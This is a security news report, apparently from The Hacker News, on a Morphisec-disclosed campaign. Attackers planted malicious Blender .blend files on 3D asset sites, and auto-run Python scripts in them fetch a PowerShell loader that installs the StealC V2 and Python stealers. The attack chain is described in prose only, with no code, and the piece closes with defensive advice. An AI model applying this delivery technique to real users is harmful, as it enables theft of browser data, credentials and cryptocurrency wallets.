Cybersecurity researchers have disclosed details of a new campaign that has leveraged Blender Foundation files to deliver an information stealer known as StealC V2.
“This ongoing operation, active for at least six months, involves implanting malicious .blend files on platforms like CGTrader,” Morphisec researcher Shmuel Uzan said in a report shared with The Hacker News.
“Users unknowingly download these 3D model files, which are designed to execute embedded Python scripts upon opening in Blender — a free, open-source 3D creation suite.”
The cybersecurity company said the activity shares similarities with a prior campaign linked to Russian-speaking threat actors that involved impersonating the Electronic Frontier Foundation (EFF) to target the online gaming community and infect them with StealC and Pyramid C2.
This assessment is based on tactical similarities in both campaigns, including using decoy documents, evasive techniques, and background execution of malware.
The latest set of attacks abuses the ability to embed Python scripts in .blend files like character rigs that are automatically executed when they are opened in scenarios where the Auto Run option is enabled. This behavior can be dangerous as it opens the door to the execution of arbitrary Python scripts.
The security risk has been acknowledged by Blender in its own documentation, which states: “The ability to include Python scripts within blend-files is valuable for advanced tasks such as rigging and automation. However, it poses a security risk since Python does not restrict what a script can do.”
The attack chains essentially involve uploading malicious .blend files to free 3D asset sites such as CGTrader containing a malicious “Rig_Ui.py” script, which is executed as soon as they are opened with Blender’s Auto Run feature enabled. This, in turn, fetches a PowerShell script to download two ZIP archives.
While one of the ZIP files contains a payload for StealC V2, the second archive deploys a secondary Python-based stealer on the compromised host. The updated version of StealC, first announced in late April 2025, supports a wide range of information gathering features, allowing data to be extracted from 23 browsers, 100 web plugins and extensions, 15 cryptocurrency wallet apps, messaging services, VPNs, and email clients.
“Keep Auto Run disabled unless the file source is trusted,” Morphisec said. “Attackers exploit Blender that typically runs on physical machines with GPUs, bypassing sandboxes and virtual environments.”
